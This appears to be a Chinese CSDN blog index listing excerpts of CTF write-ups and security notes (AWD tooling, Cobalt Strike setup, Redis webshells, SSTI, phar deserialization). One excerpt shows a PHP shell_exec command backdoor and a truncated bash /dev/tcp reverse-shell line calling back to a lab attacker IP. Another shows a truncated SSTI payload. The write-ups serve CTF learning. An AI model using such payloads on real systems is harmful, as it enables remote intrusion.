自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(50)
  • 收藏
  • 关注

原创 Ubuntu18简单配置AoiAWD

目录配置虚拟机静态IP配置AoiAWD之前打比赛的时候室友教了我一下配置AoiAWD,现在有时间自己配了一遍,把步骤记一下。AoiAWD地址:https://github.com/DasSecurity-HatLab/AoiAWD配置虚拟机静态IP本机利用ipconfig /all查看本机网段,记下本机所连接的网络的连接描述、子网掩码和默认网关打开VMware,将安装aoiawd虚拟机的网络适配器改为桥接打开VMvare,进入编辑->虚拟网络编辑器->更改设置选择

2020-11-30 16:58:36 3946 13

原创 添加windows terminal到右键

目录windows terminal下载及修改背景进入microsoft store搜索windows terminal即可下载。下载完后,启动windows terminal,点击下面的图标进入设置,找到list处,可以看到powershell、cmd和Azure Cloud Shell(如果装了wsl这里也会有)在想配置的地方末尾添加如下配置: "backgroundImage": "C:\\Users\\中二bing\\Pictures\\桌面\\1111.jpg", "backgr

2020-10-31 11:44:12 1133

原创 AWD准备的一些脚本和工具及其使用方法

最近一段时间去打了一次省赛的线下,虽然体验不怎么好,但有些准备的小东西还是不错的,写下来分享一下:代码审计工具seay源码审计系统,下载链接:https://github.com/f1tz/cnseay。这个源码审计工具有点点拉,但还是比没有好。使用方法:然后结果就在右边。...

2020-09-23 19:12:52 9184 1

原创 刷题记录(持续更新

刷题记录BUUCTF 2018 online Tools网鼎杯 2018 unfinishBUUCTF 2018 online Tools考点有两个:nmap写入文件和escapeshellarg()+escapeshellcmd()两个函数的配合。打开题目,看到代码:<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { ...

2020-06-21 20:14:43 792

原创 一道CTF题看JWT和python反序列化

目录题目题解知识点JWTPython 序列化与反序列化题目题为[CISCN2019 华北赛区 Day1 Web2]ikun题解打开,看到这里看来要找到lv6,写个小脚本:#[CISCN2019 华北赛区 Day1 Web2]ikun,找lv6import requestsurl = "http://9592eed0-512a-4494-bedb-332fdf504447.node3.buuoj.cn/shop?page="for i in range(0,2000): r=requ

2020-06-20 15:04:18 1719

原创 [ASIS 2019]Unicorn shop中UTF-8与Unicode编码转换的安全问题

打开题目,看到购买页面:尝试购买,输入ID=1,Price=2,发现购买失败:再尝试购买最贵的独角兽,发现有问题:提示我们只能输入一个字符。再加上在head标签里的提示:猜测可能是编码转换问题,而且如果成功购买第四个独角兽就可以成功得到flag。题中编码为UTF-8编码,我们可以用UTF-8与Unicode的编码转换问题来绕过一个字符的限制。在这个网站搜索一个大于1337的数字,如:这题的大致思路是这样的:传入UTF-8编码,在后端处理的过程中,发现该UTF-8编码无法解析为ASCI

2020-06-17 10:19:48 573

原创 cobaltstrike安装

cobaltstrike4.0这个神器久仰大名,同学给了一份资源,正好来安装一下准备工作首先确保在jdk版本为8或以上(如果安装了,用java- -version查看)准备一台linux服务器,一台Windows主机(windows主机用来查看,linux服务器用来进行攻击)准备两台机子上都准备好cobaltstrike安装过程Windows安装JDK(版本在8及以上),并将其添加到环境变量里。linux服务器在安全组里开放50050端口、确保80端口没有被占用(比如被nginx或者a

2020-06-15 22:09:46 1581

原创 [RoarCTF 2019]Easy Java学到的tomcat安全小知识

目录题目知识点梳理:WEB-INF目录疑惑之处关于javaIO题目点进去看到这个登陆框:点击help,发现URL发生变化,且多了一条报错信息把发包方式换成POST,发现可以下载help.docx:下载help.docx后,发现什么都没有。于是我们构造一个错误的POST包,得到它的文件路径:接下来就好办了。WEB-INF是Java的WEB应用的安全目录。所谓安全就是客户端无法访问,只有服务端可以访问的目录。以我下的Tomcat里的例子来看:/WEB-INF/web.xml 你的We

2020-06-15 21:16:28 287

原创 RCTF2020 复现

题目webcalcMiscSwitch PRO Controllerwebcalc抓包后发现数据发送至calc.php,访问该页面后,代码审计:<?phperror_reporting(0);if(!isset($_GET['num'])){ show_source(__FILE__);}else{ $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\['

2020-06-06 22:38:45 1066

原创 GKCTF部分题解

题解目录webChickIN老八小超市儿CVE版签到EZ三剑客-EZwebMISCPokémoncode obfuscationwebChickIN代码审计<?php highlight_file(__FILE__);class ClassName{ public $code = null; public $decode = null; function __construct() { $t

2020-05-27 13:19:35 1300

原创 kali里遇到的一些小问题及解决方法

在进行apt安装等操作时,经常探弹出dpkg:警告:无法找到xxx软件包。解决方法如下:cd /var/lib/dpkgmv info old_infoapt-get updatecp –f old_info/ info#在update之后他会创建一个新的info文件夹apt-get update ...

2020-05-27 09:52:11 626

原创 小爬虫学到的一点东西

这几天学了一下怎么写爬虫爬百度的页面,借同学的代码看了看,学到了点东西,记一下。我写的爬虫很简单,就是get传入搜索内容,然后爬取response里的网址就行了。需要注意的是:GET传参时需要带上cookie,不然不会返回搜索结果。然后用正则表达式匹配这里的html代码就行。注意,这里的正则表达式需要用re.findall(),re.search()只会返回匹配到的第一串字符。且re.fin...

2020-04-29 10:34:29 176

原创 初步认识redis和redis获取webshell方法

什么是redis一个免费、开源的Key-Value数据库。(MySQL是关系型数据库)redis和mysql的区别mysql可以通过where等sql语句来查询想要的数据,而redis并不关系存储的数据类型,只能通过key来寻找value,也就是说Key-Value需要通过遍历所有的key才能找到想要的value。mysql的存储更加倾向于作为一个表,而redis则是键值对。放一张其...

2020-04-08 14:48:05 466

原创 初步认识SSTI

SSTI,即服务端模板注入,起因是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,从而导致各种各样的问题。先举一个熟悉一点的语言模板作为例子:php模板引擎Twig参考文章:http://drops.xmd5.com/static/drops/tips-10205.htmlhttps://www.cnblogs.com/h...

2020-04-03 17:26:35 1401

原创 反弹shell

嫌疑人:192.168.249.147受害者:192.168.249.130这次的主要目的是模拟CTF题目中反弹shell。首先,我们在受害机网站准备一个shell.php文件,内容如下:<?phpshell_exec($_GET['a'])?>,用以命令执行。再在嫌疑人网站根目录准备一个con.txt文件,内容如下:bash -i >& /dev/tcp/19...

2020-04-03 11:31:05 1019 3

原创 MRCTF复现

目录Misc千层套路ezmiscWebEzpop套娃pyflagez_bypass传马ez_auditEzpop_RevengeMisc千层套路和BJDCTF的一题一样,密码为文件名,重复解压,脚本跑就完事了。ezmisc修改行高。WebEzpop点开即可看到源码,如下: <?php//flag is in flag.php//WTF IS THIS?//Learn...

2020-04-02 17:37:31 1138

原创 易博霖部分WP

今天打了一场比赛,学到了挺多东西,写下来记一下。web2这题做了我很久,印象很深刻。开始将file参数进行两次解码之后发现是一个文件名。读取index.php文件,在<img>处查看。base64解码之后,代码如下:<?phperror_reporting(E_ALL || ~E_NOTICE);header('content-type:text/html;char...

2020-03-27 23:23:12 229

原创 BJDCTF2nd部分题目复现

复现webfake googleold-hackduangShellSchrödingermisc最简单的miscA_Beautiful_Picture小姐姐EasyBaBaReal_EasyBaBa圣火昭昭TARGZImaginwebfake google显然,这是一个SSTI,直接上payload?name={{config.__class__.__init__.__globals...

2020-03-26 17:53:23 1109

原创 网鼎杯2018 comment

本次知识点git恢复文件二次注入git恢复文件如何判断是否可以恢复?看是否有commit文件,如果没有,则需要恢复,像这题:可以看到,

2020-03-20 18:14:15 2079 1

原创 GXYCTF2019 复现

GXYCTF复现pingpingping禁止套娃pingpingping打开页面:显然是命令执行。GET传入ip=127.0.0.1 | ls尝试用cat读取,发现过滤了空格,可以利用$IFS$9、$IFS来绕过,(${IFS}不行,花括号被过滤了),读取flag文件,发现对flag也进行了过滤,尝试用*绕过,发现也过滤了,读取一下index.php,代码如下:<?phpif...

2020-03-19 15:48:22 630

原创 BUUCTF Fakebook

注册一个admin账户,然后登陆,没有发现什么东西。点进view.php一看,发现好像有个注入点。尝试注入,发现对union进行了过滤,可以用/**/进行绕过。可以看到有一个反序列化,然后我就没有思路了。看了wp才知道,还有个备份文件user.php.bak和flag.php,user.php.bak代码如下:<?phpclass UserInfo{ public...

2020-03-18 11:47:16 937

原创 Python多线程学习笔记

python的多线程有两个模块来实现:thread和threading,thread模块用的很少,更偏向于底层操作。一般都用threading模块进行操作。

2020-03-17 16:02:59 81

原创 phar反序列化的初步认识

参考文章这类的题也写了很多了,每次碰到都是懵的,今天看到一篇文章的Demo让我能比较简单地让我理解大概流程,写下来记录一下。phar反序列化是由于php生成的phar文件中的一部分通过序列化存储而且可控,而文件在利用file_get_content()等函数用phar://协议包含文件时会对phar文件进行反序列化。我们可以在魔术方法里写入一些代码,在反序列化时自动调用魔术方法,从而达到攻击的...

2020-03-13 00:06:28 372

原创 XSS学习笔记

XSS(跨站脚本攻击)分为反射型(不持久)、存储型(存储在服务器中,持久)、DOM型。

2020-03-09 16:05:50 158

原创 PentesterLab » Web for Pentester 通关笔记

寒假看到一个练习题,很有意思也很适合我这样的新手,于是下载下来练手。下载地址

2020-02-08 11:43:19 996

原创 Ubuntu和Kali部分常用命令及常用配置文件位置

更新apt-get update//获取更新列表apt-get upgrade//更新apt-get dist-upgrade//更新内核清理垃圾apt-get autoclean//清理部分缓存apt-get autoremove//移除没用的依赖包

2020-01-29 11:30:45 664

原创 Ubuntu18的一些简单配置

安装nginxsudo apt-get install nginx安装phpsudo apt-get install php安装php-fpmsudo apt-get install php-fpm//安装这个的作用是使nginx能够解析php文件配置相关文件输入php -v查看php版本一般来说php-fpm的版本是与php版本相同的进入/etc/nginx/sites...

2020-01-28 20:09:09 223

原创 AI_web_1 ,靶机初体验

大佬给了个这个靶机给我玩,我就试着打了一下,学到了很多东西,就记录下来了首先,用netdiscover先看看主机的ip是啥:试试第一个图中可以看到,只开了个80端口,apache的中间件,其中的文件有robots.txt,下面两个目录不允许进入,这应该就是靶机的IP了。浏览器打开看看:试试id=1:估计有注入,祭出神器sqlmap:但是,好像没有意义,因为这个是sql用户,...

2019-12-06 12:37:05 360

转载 Docker使用教程

安装docker及其相关组件:apt-get update //更新软件apt-get installapt-get install apt-transport-httpsapt-get install ca-certificatesapt-get install curlapt-get install software-properties-common ...

2019-11-19 23:48:26 311

原创 XXE读取文件 Geek10th

点开网站:抓包,修改属性:返回了这么一串:由于是$name==md5(),由弱类型比较和md5想到md5碰撞,

2019-11-14 10:30:34 993

原创 Geek10thweb 又来一只猫

最近和同学一起做别人的招新题,学到了些新的东西,记下来以免忘记。打开网页,看到一只猫:备份网站的习惯,我试了试.bak,发现没有,然后用御剑扫了一下后台,扫出来了www.zip。下载下来看看:看到个flag.php,点进去,提交发现是错的flag。再看看index.php,看到一行关键代码:猜测是反序列化漏洞。再看看class.php<?phpinclude 'fl...

2019-11-06 17:21:05 155

原创 RoarCTF Easy Calc wp

点开界面:随便输入数字,抓包,发现有个php文件:我们跳转看看:试着传入num参数为字符,发现:方法一:官方wp表示考点为php字符串解析绕过modsecurity(这做题的时候谁知道啊)这里有一篇文章进行了详细介绍,简而言之就是在传参...

2019-10-31 11:36:27 233

原创 RoarCTFweb-simple upload

前一段时间的嘶吼CTF做的我自闭了,正好现在wp出来了,学长也搞了环境,顺手白嫖一下,试着按照wp做了一遍,学习了一下新知识。首先,题目提示我们这是文件上传,源码也告诉了我们,但我试了一下upload.php等发现没有文件上传的页面,估计是要自己写脚本上传文件。再看看源码:```php<?phpnamespace Home\Controller;useThink\Control...

2019-10-25 07:46:08 698

原创 MySQL学习笔记(一)

库->表->列->行SQL不分大小写,但一般默认关键字为大写,表名和列名为小写。创建数据库用CREATE语句,语句与语句之间用;隔开,不然判断为同一条语句。CREATE DATABASE test; #创建test数据库SHOW DATABASES; ...

2019-07-15 08:52:47 62

原创 Python requests库的一些常用方法

requests.get()首先,确定url。这里,我们定义url为bugku中的一个题目import requests #这个和request不一样,这是两个不同的库url = "http://123.206.87.240:8002/qiumingshan/"此时,我们可以使用requests的一个方法r = request.get(url) #相当于在网址栏输入了...

2019-07-07 09:57:36 475

原创 PHP学习笔记(九)

代码重用和函数编写代码重用代码重用,顾名思义,即为重复使用代码的意思,主要通过两个函数来实现:include()和require()。使用方法:include(xxx.php)或require(xxx.php)此时,该函数会执行引用文件中的代码。二者几乎完全相同,但区别在于语句执行失败之后, require()会返回一个致命的错误,而include()只返回一个警告。函数编写PHP中函...

2019-05-02 10:17:50 77

原创 一个关于本地包含和PHP伪协议的CTF题(Bugku——flag在index里)

在点开题目链接,查看源代码之后,我们看到这个界面:这看起来没什么,我们点击链接之后,发现它的URL发生了变化:看到file,即想到了本地文件包含漏洞。根据题目flag在index里,但index文件并没有flag,因为PHP代码是后端解析实现,不会在前端显示代码,所以返回的是运行结果。于是想到我们可以使用PHP伪协议来读取隐藏的内容,关于PHP伪协议的内容,可以参照PHP手册相关内容(可...

2019-04-14 20:01:33 1341

原创 PHP学习笔记(八)

正则表达式<?php$a = "time to shop";if(preg_match('/shop/', $a)){ echo "yes";}else{ echo "no";}?>结果如图:上面代码的意思是在$a中匹配shop字符串,如果匹配成功,则输出yes,否则输出no。其中的shop就是正则表达式。//是分隔符,每个表达式必须包含在一对分隔符中。可...

2019-04-10 23:03:59 66

原创 PHP学习笔记(七)

字符串操作字符串截断trim():可以除去字符串开始位置和结束位置的空格,并将结果字符串返回。默认情况下除去的是换行符(\n)回车符(\r)、水平和垂直制表符(\t和\x0B)、字符结束符(\0)和空格。你也可以在第二个参数指定要过滤的字符列表。<?php$a=" hello world!\n";echo $a;echo trim($a);echo $a;?>运行...

2019-04-01 23:55:11 71

原创 HTML学习笔记(四)

制作表单

2019-03-27 21:40:58 65

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除